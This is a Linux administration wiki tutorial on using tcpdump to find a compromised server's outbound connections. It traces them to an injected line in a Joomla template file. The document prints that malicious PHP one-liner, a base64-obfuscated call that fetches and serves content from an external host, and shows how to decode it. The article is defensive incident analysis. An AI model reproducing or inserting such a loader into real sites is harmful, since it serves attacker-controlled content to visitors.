Using tcpdump to detect malware presence

From lxadm | Linux administration tips, tutorials, HOWTOs and articles
Jump to: navigation, search

tcpdump can be quite useful for finding malware on a a busy server, where temporarily stopping the traffic will affect many users and thus is not recommended.

Note that it will be only useful if the malware is connecting to some external servers.

An example command:

tcpdump -i eth0 -v -n dst host not 192.168.x.y and dst port 80 and host not 66.155.40.250

Some explanations:

dst host not – you want to give your server IP here; if your server have more IPs, you can add it more times, for example, “dst host not 192.168.x.y and dst host not 192.168.a.b” and so on,
dst port – malware will likely connect to destination port 80,
host not 66.155.40.250 – we’re excluding our outgoing traffic to wordpress.com here.

Finally, run it!

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

10:13:36.725262 IP (tos 0x0, ttl 64, id 55, offset 0, flags [DF], proto TCP (6), length 60)
192.168.x.y.39874 > 92.63.104.163.http: Flags [S], cksum 0x42cc (correct), seq 1278554780, win 14600, options [mss 1460,sackOK,TS val 4233900715 ecr 0,nop,wscale 7], length 0
10:13:37.724713 IP (tos 0x0, ttl 64, id 56, offset 0, flags [DF], proto TCP (6), length 60)
192.168.x.y.39874 > 92.63.104.163.http: Flags [S], cksum 0x3ee4 (correct), seq 1278554780, win 14600, options [mss 1460,sackOK,TS val 4233901715 ecr 0,nop,wscale 7], length 0
10:13:39.724742 IP (tos 0x0, ttl 64, id 57, offset 0, flags [DF], proto TCP (6), length 60)
192.168.x.y.39874 > 92.63.104.163.http: Flags [S], cksum 0x3714 (correct), seq 1278554780, win 14600, options [mss 1460,sackOK,TS val 4233903715 ecr 0,nop,wscale 7], length 0

What this says, is that this server is connecting out to 92.63.104.163 – a server operating somewhere in Russia.


Further inspection on the server revealed that the malware was added to templates/rt_mobius/index.php, belonging to Joomla – a CMS with looong history for remote vulnerabilities:

<?php error_reporting(0);@print(file_get_contents(base64_decode("aHR0cDovLzkyLjYzLjEwNC4xNjMvZ2V0LnBocA==")));?>


What does it do?


Try creating an empty PHP file with the following content:

<?php
print(base64_decode("aHR0cDovLzkyLjYzLjEwNC4xNjMvZ2V0LnBocA=="));


Executing it will print out where the malicious code tried to connect (we’ve used print instead of file_get_contents to see it):

http://92.63.104.163/get.php